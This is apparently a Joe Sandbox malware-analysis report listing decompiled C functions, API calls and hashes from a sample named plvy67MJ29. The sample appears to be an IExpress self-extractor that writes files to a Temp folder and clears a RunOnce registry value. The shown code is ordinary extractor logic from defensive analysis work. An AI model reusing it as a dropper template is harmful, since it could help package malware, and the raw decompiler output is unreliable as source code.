                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-256195474
                                                                                                                                                                                                    • Opcode ID: 140ebd4e5f091dc37d6b1c57e71f9c286f207dcdcbe41ee36aee8ca770397fd9
                                                                                                                                                                                                    • Instruction ID: 4ce054be4e2307af83c6334f5f4914ca3892ac05203ec144b496f9ceffbd5dac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 140ebd4e5f091dc37d6b1c57e71f9c286f207dcdcbe41ee36aee8ca770397fd9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421D432906618EBCB20AB74EC09B6937A3BB00BA1F0C015BE441563A0CFF95C85FB40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD1FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0xfd8530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00fd1fee
                                                                                                                                                                                                    0x00fd2005
                                                                                                                                                                                                    0x00fd200d
                                                                                                                                                                                                    0x00fd2017
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2020
                                                                                                                                                                                                    0x00fd200d
                                                                                                                                                                                                    0x00fd2029

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00FD538C,?,?,00FD538C), ref: 00FD2005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(00FD538C,wextract_cleanup3,?,?,00FD538C), ref: 00FD2017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00FD538C,?,?,00FD538C), ref: 00FD2020
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                    • API String ID: 849931509-2968168367
                                                                                                                                                                                                    • Opcode ID: 4779a972526070d76989c59d9f8dc1a2906e18eaa5f45491d52992b945cba1bb
                                                                                                                                                                                                    • Instruction ID: 6bfff8ada9f93c565033a04e35af7f6347dcb7303dac644c4eb7b3c122807df6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4779a972526070d76989c59d9f8dc1a2906e18eaa5f45491d52992b945cba1bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE04F3095131CBBD7219BA0EC0EF597B2BEB00790F180297B904A0160EB619A14F64A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				long _t46;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				long _t51;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                    				CHAR* _t74;
                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __edx;
                                                                                                                                                                                                    				_t29 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                    				_v8 = _t30;
                                                                                                                                                                                                    				_t75 = _a8;
                                                                                                                                                                                                    				if( *0xfd91d8 == 0) {
                                                                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                    						_t33 = E00FD4E99(_t75);
                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                    						return E00FD6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = _t32 - 1;
                                                                                                                                                                                                    					__eflags = _t35;
                                                                                                                                                                                                    					if(_t35 == 0) {
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t36 = _t35 - 1;
                                                                                                                                                                                                    					__eflags = _t36;
                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                    						_t37 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                    							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t54 = 0xfd91e4;
                                                                                                                                                                                                    						_t58 = 0xfd91e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t38 =  *_t58;
                                                                                                                                                                                                    							_t58 =  &(_t58[1]);
                                                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                                                    						} while (_t38 != 0);
                                                                                                                                                                                                    						_t59 = _t58 - 0xfd91e5;
                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                    						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t73 =  &(_t71[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t39 =  *_t71;
                                                                                                                                                                                                    							_t71 =  &(_t71[1]);
                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0xfd91e4;
                                                                                                                                                                                                    						_t30 = E00FD4702( &_v268, 0xfd91e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t41 = E00FD476D( &_v268, __eflags);
                                                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                                                    						if(_t41 == 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0x180);
                                                                                                                                                                                                    						_t30 = E00FD4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                    						_t75 = _t30;
                                                                                                                                                                                                    						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                    						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E00FD47E0( &_v268);
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0xfd93f4 =  *0xfd93f4 + 1;
                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						_t54 = 0xfd91e4;
                                                                                                                                                                                                    						_t63 = 0xfd91e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t64 = _t63 - 0xfd91e5;
                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0xfd91e4;
                                                                                                                                                                                                    						_t30 = E00FD4702( &_v268, 0xfd91e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                    						_t30 = E00FD4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00FD4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                    					_t30 = E00FD4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                    			}































                                                                                                                                                                                                    0x00fd4cd0
                                                                                                                                                                                                    0x00fd4cdb
                                                                                                                                                                                                    0x00fd4ce0
                                                                                                                                                                                                    0x00fd4ce2
                                                                                                                                                                                                    0x00fd4cee
                                                                                                                                                                                                    0x00fd4cf2
                                                                                                                                                                                                    0x00fd4d0e
                                                                                                                                                                                                    0x00fd4d0e
                                                                                                                                                                                                    0x00fd4d11
                                                                                                                                                                                                    0x00fd4e83
                                                                                                                                                                                                    0x00fd4e88
                                                                                                                                                                                                    0x00fd4e98
                                                                                                                                                                                                    0x00fd4e98
                                                                                                                                                                                                    0x00fd4d17
                                                                                                                                                                                                    0x00fd4d17
                                                                                                                                                                                                    0x00fd4d1a
                                                                                                                                                                                                    0x00fd4d2f
                                                                                                                                                                                                    0x00fd4d2f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d2f
                                                                                                                                                                                                    0x00fd4d1c
                                                                                                                                                                                                    0x00fd4d1c
                                                                                                                                                                                                    0x00fd4d1f
                                                                                                                                                                                                    0x00fd4dcb
                                                                                                                                                                                                    0x00fd4dd0
                                                                                                                                                                                                    0x00fd4dd2
                                                                                                                                                                                                    0x00fd4ddd
                                                                                                                                                                                                    0x00fd4ddd
                                                                                                                                                                                                    0x00fd4de3
                                                                                                                                                                                                    0x00fd4de8
                                                                                                                                                                                                    0x00fd4ded
                                                                                                                                                                                                    0x00fd4ded
                                                                                                                                                                                                    0x00fd4def
                                                                                                                                                                                                    0x00fd4df0
                                                                                                                                                                                                    0x00fd4df0
                                                                                                                                                                                                    0x00fd4df4
                                                                                                                                                                                                    0x00fd4df4
                                                                                                                                                                                                    0x00fd4df6
                                                                                                                                                                                                    0x00fd4df9
                                                                                                                                                                                                    0x00fd4dfc
                                                                                                                                                                                                    0x00fd4dfc
                                                                                                                                                                                                    0x00fd4dfe
                                                                                                                                                                                                    0x00fd4dff
                                                                                                                                                                                                    0x00fd4dff
                                                                                                                                                                                                    0x00fd4e03
                                                                                                                                                                                                    0x00fd4e08
                                                                                                                                                                                                    0x00fd4e0a
                                                                                                                                                                                                    0x00fd4e0f
                                                                                                                                                                                                    0x00fd4d03
                                                                                                                                                                                                    0x00fd4d03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d03
                                                                                                                                                                                                    0x00fd4e18
                                                                                                                                                                                                    0x00fd4e20
                                                                                                                                                                                                    0x00fd4e25
                                                                                                                                                                                                    0x00fd4e27
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e33
                                                                                                                                                                                                    0x00fd4e38
                                                                                                                                                                                                    0x00fd4e3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e40
                                                                                                                                                                                                    0x00fd4e51
                                                                                                                                                                                                    0x00fd4e56
                                                                                                                                                                                                    0x00fd4e5b
                                                                                                                                                                                                    0x00fd4e5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e6a
                                                                                                                                                                                                    0x00fd4e6f
                                                                                                                                                                                                    0x00fd4e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e77
                                                                                                                                                                                                    0x00fd4e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4e7d
                                                                                                                                                                                                    0x00fd4d25
                                                                                                                                                                                                    0x00fd4d25
                                                                                                                                                                                                    0x00fd4d28
                                                                                                                                                                                                    0x00fd4d36
                                                                                                                                                                                                    0x00fd4d3b
                                                                                                                                                                                                    0x00fd4d40
                                                                                                                                                                                                    0x00fd4d40
                                                                                                                                                                                                    0x00fd4d42
                                                                                                                                                                                                    0x00fd4d43
                                                                                                                                                                                                    0x00fd4d43
                                                                                                                                                                                                    0x00fd4d47
                                                                                                                                                                                                    0x00fd4d4a
                                                                                                                                                                                                    0x00fd4d4a
                                                                                                                                                                                                    0x00fd4d4c
                                                                                                                                                                                                    0x00fd4d4f
                                                                                                                                                                                                    0x00fd4d4f
                                                                                                                                                                                                    0x00fd4d51
                                                                                                                                                                                                    0x00fd4d52
                                                                                                                                                                                                    0x00fd4d52
                                                                                                                                                                                                    0x00fd4d56
                                                                                                                                                                                                    0x00fd4d5b
                                                                                                                                                                                                    0x00fd4d5d
                                                                                                                                                                                                    0x00fd4d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d67
                                                                                                                                                                                                    0x00fd4d6f
                                                                                                                                                                                                    0x00fd4d74
                                                                                                                                                                                                    0x00fd4d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d7c
                                                                                                                                                                                                    0x00fd4d84
                                                                                                                                                                                                    0x00fd4d89
                                                                                                                                                                                                    0x00fd4d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d94
                                                                                                                                                                                                    0x00fd4d99
                                                                                                                                                                                                    0x00fd4d9e
                                                                                                                                                                                                    0x00fd4da1
                                                                                                                                                                                                    0x00fd4daa
                                                                                                                                                                                                    0x00fd4daa
                                                                                                                                                                                                    0x00fd4da3
                                                                                                                                                                                                    0x00fd4da3
                                                                                                                                                                                                    0x00fd4da3
                                                                                                                                                                                                    0x00fd4db5
                                                                                                                                                                                                    0x00fd4dbb
                                                                                                                                                                                                    0x00fd4dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4dc3
                                                                                                                                                                                                    0x00fd4dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4dc5
                                                                                                                                                                                                    0x00fd4dbd
                                                                                                                                                                                                    0x00fd4d2a
                                                                                                                                                                                                    0x00fd4d2a
                                                                                                                                                                                                    0x00fd4d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4d2d
                                                                                                                                                                                                    0x00fd4cf8
                                                                                                                                                                                                    0x00fd4cfd
                                                                                                                                                                                                    0x00fd4d02
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00FD4DB5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00FD4DDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    • API String ID: 3625706803-256195474
                                                                                                                                                                                                    • Opcode ID: 5c1c74ba8fae2e90f08c0cf2cbdf6e928bc90c07f07f36d6a33763b18c965d2e
                                                                                                                                                                                                    • Instruction ID: 1141051d7ac172d0120eb429b69c2f1d420911654da3fc0707f0c79a37d13555
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c1c74ba8fae2e90f08c0cf2cbdf6e928bc90c07f07f36d6a33763b18c965d2e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB411336A041059BCB319F38DD446B573A7EB85320F0C466BE88697385DA36FE4AF750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                    				struct _FILETIME _v20;
                                                                                                                                                                                                    				FILETIME* _t14;
                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __ecx * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t21 + 0xfd8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t14 =  &_v12;
                                                                                                                                                                                                    					_t15 = SetFileTime( *(_t21 + 0xfd8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00fd4c40
                                                                                                                                                                                                    0x00fd4c4a
                                                                                                                                                                                                    0x00fd4c8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4c70
                                                                                                                                                                                                    0x00fd4c70
                                                                                                                                                                                                    0x00fd4c7e
                                                                                                                                                                                                    0x00fd4c86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4c8a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00FD4C54
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FD4C66
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00FD4C7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                    • Opcode ID: 160353f878a4c6f151bac3604d8a0f74397980b02961c2e37d8df2099b927611
                                                                                                                                                                                                    • Instruction ID: e93341555d8f949a8a69e1923fcbd53702e86c9140982b8a9e3d15f87362d688
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160353f878a4c6f151bac3604d8a0f74397980b02961c2e37d8df2099b927611
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0BB7291110D6F9F14DFB4CC49DBB77AFEB04350748062BA415C1190FA30E914FB64
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00FD487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				CHAR* _t11;
                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                    				asm("sbb edi, edi");
                                                                                                                                                                                                    				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                    				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                    					asm("sbb esi, esi");
                                                                                                                                                                                                    					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                                                                    						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                    				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                    					return _t7;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00FD490C(_t11);
                                                                                                                                                                                                    					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00fd4880
                                                                                                                                                                                                    0x00fd488c
                                                                                                                                                                                                    0x00fd4894
                                                                                                                                                                                                    0x00fd48a0
                                                                                                                                                                                                    0x00fd48c9
                                                                                                                                                                                                    0x00fd48ce
                                                                                                                                                                                                    0x00fd48a2
                                                                                                                                                                                                    0x00fd48a8
                                                                                                                                                                                                    0x00fd48b7
                                                                                                                                                                                                    0x00fd48bc
                                                                                                                                                                                                    0x00fd48aa
                                                                                                                                                                                                    0x00fd48ac
                                                                                                                                                                                                    0x00fd48ac
                                                                                                                                                                                                    0x00fd48a8
                                                                                                                                                                                                    0x00fd48de
                                                                                                                                                                                                    0x00fd48e7
                                                                                                                                                                                                    0x00fd490b
                                                                                                                                                                                                    0x00fd48ee
                                                                                                                                                                                                    0x00fd48f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4902

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00FD4A23,?,00FD4F67,*MEMCAB,00008000,00000180), ref: 00FD48DE
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00FD4F67,*MEMCAB,00008000,00000180), ref: 00FD4902
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 61c4bdb1254a510e90ba68b4c0b96fc7534d98061442fd1176c012ac173e38fd
                                                                                                                                                                                                    • Instruction ID: a9f34ff83168f015907eda5ec83ee50565be8fc46d5fe05d6c7e955109635207
